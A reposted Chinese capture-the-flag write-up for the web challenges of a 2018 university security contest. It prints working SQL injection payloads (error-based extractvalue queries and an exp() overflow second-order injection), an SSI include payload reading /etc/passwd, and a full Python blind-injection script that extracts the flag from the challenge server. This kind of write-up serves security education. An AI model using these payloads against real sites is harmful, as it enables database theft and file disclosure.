2018高校网络信息安全管理运维挑战赛-Web题解

admin 2021年12月14日10:49:11评论125 views字数 2445阅读8分9秒阅读模式

更多全球网络安全资讯尽在邑安全

SimpleBBS

随手登录一下
2018 高校网络信息安全管理运维挑战赛-Web题解发现报错,于是尝试

admin' and (extractvalue(1,concat(0x7e,database())))#

2018 高校网络信息安全管理运维挑战赛-Web题解

admin' and (extractvalue(1,concat(0x7e,(select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()))))#

2018 高校网络信息安全管理运维挑战赛-Web题解

admin' and (extractvalue(1,concat(0x7e,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='flag'))))#

2018 高校网络信息安全管理运维挑战赛-Web题解

admin' and (extractvalue(1,concat(0x7e,(select flag from flag limit 0,1))))#

2018 高校网络信息安全管理运维挑战赛-Web题解前半段

'~EIS{7879f0a27d8bcfcff0bcc837d76'
admin' and (extractvalue(1,concat(0x7e,(select substr(flag,30,60) from flag limit 0,1))))#

2018 高校网络信息安全管理运维挑战赛-Web题解后半段

~7641e81}

最后flag

EIS{7879f0a27d8bcfcff0bcc837d7641e81}

SimpleServerInjection

题目提示

SimpleServerInjection, SSI, flag in current directory

随即搜索SSI

https://blog.csdn.net/wutianxu123/article/details/82724637

结果这个文章第一个就是payload。。。

<!--#include virtual="/etc/passwd" -->

于是测试

http://210.32.4.22/index.php?name=<!--#include virtual="flag" -->

2018 高校网络信息安全管理运维挑战赛-Web题解得到flag

EIS{59f2c02f18838b3fb57dd57e2808f9c2}

SimpleExtensionExplorerInjection

题目提示XXE,直接xxe是不行的
2018高校网络信息安全管理运维挑战赛-Web题解所以需要改type
2018 高校网络信息安全管理运维挑战赛-Web题解然后即可xxe读文件,得到flag

SimplePrintEventLogger

直接可以进行列目录
2018高校网络信息安全管理运维挑战赛-Web题解然后得到flag2018高校网络信息安全管理运维挑战赛-Web题解不知道是不是非预期了?题目提示RCE,还有一个backdoor的路由没用上
2018 高校网络信息安全管理运维挑战赛-Web题解SimpleBlog

发现题目提示2次注入

2018 高校网络信息安全管理运维挑战赛-Web题解于是尝试注册

sky'
sky'#

发现前者分数都是0,后者有分数
那么可以判断,更新分数的时候使用了用户名
但是想要构造一般的bool盲注不行,因为必须sql语句报错
这里想到整数溢出问题

1' and if(1,exp(999999999999),1)#

这样即可使sql语句报错,导致出现

grade 0

而如果使用

1' and if(0,exp(999999999999),1)#

那么分数一切正常,于是可以利用这一点进行注入

编写脚本

import requests
def reg(username,password='1'):
data = {
'username':username,
'password':password
}
url = 'http://210.32.4.20/register.php'
r = requests.post(url=url,data=data)
return r.headers['Set-Cookie'][10:-8]

def login(session,username,password='1'):
data = {
'username': username,
'password': password
}
cookie = {
'PHPSESSID':session
}
url = 'http://210.32.4.20/login.php'
r = requests.post(url=url, data=data,cookies=cookie)
data = {
'10.a':'on'
}
url = 'http://210.32.4.20/answer.php'
r = requests.post(url=url, data=data,cookies=cookie)
if 'Your grades is 0' in r.content:
return 1
url = 'http://210.32.4.20/logout.php'
r = requests.get(url=url,cookies=cookie)
return 0
flag = 'EIS{'
for i in range(5,1000):
for k in 'abcdef0123456789}':
j = ord(k)
payload='''1' and if((ascii(substr((select flag from flag limit 0,1),%d,1))=%d),exp(999999999999),1)#'''%(i,j)
try:
session = reg(payload)
if login(session,payload):
flag+=chr(j)
print flag
break
except:
session = reg(payload)
if login(session,payload):
flag+=chr(j)
print flag
break

2018 高校网络信息安全管理运维挑战赛-Web题解

不知道题目提示文件包含是什么意思,可能非预期了?
2018 高校网络信息安全管理运维挑战赛-Web题解

原文来自: freebuf.com

原文链接: https://xz.aliyun.com/t/3310

欢迎收藏并分享朋友圈,让五邑人网络更安全

2018高校网络信息安全管理运维挑战赛-Web题解

欢迎扫描关注我们,及时了解最新安全动态、学习最潮流的安全姿势!


推荐文章

1

新永恒之蓝?微软SMBv3高危漏洞(CVE-2020-0796)分析复现

2

重大漏洞预警:ubuntu最新版本存在本地提权漏洞(已有EXP) 



本文始发于微信公众号(邑安全):2018 高校网络信息安全管理运维挑战赛-Web题解

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月14日10:49:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2018高校网络信息安全管理运维挑战赛-Web题解https://cn-sec.com/archives/440009.html

发表评论

匿名网友 填写信息